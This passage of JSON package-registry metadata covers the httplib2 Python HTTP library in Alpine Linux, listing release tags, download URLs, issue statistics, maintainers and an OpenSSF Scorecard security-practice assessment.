0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T02:37:25.364Z","dependent_packages_count":5,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":3.5967375317555823,"stargazers_count":7.414092793154165,"forks_count":5.114320096269555,"average":4.031287605294826},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.14","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":182,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-20T00:01:31.539Z","updated_at":"2023-02-20T00:01:31.539Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.14","url":"https://pkgs.alpinelinux.org/packages?branch=v3.14","ecosystem":"alpine","default":false,"packages_count":14958,"maintainers_count":258,"namespaces_count":2,"keywords_count":2179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":682},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.706Z","updated_at":"2026-08-18T05:04:15.407Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/namespaces"}},{"id":6132186,"name":"py-httplib2","ecosystem":"alpine","description":"A Python HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-04-21T07:55:41.000Z","latest_release_published_at":"2017-04-21T07:55:41.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-10T13:08:32.819Z","created_at":"2023-01-31T22:12:10.877Z","updated_at":"2026-08-22T02:37:25.384Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.6/main/x86_64/py-httplib2","install_command":"apk add py-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"20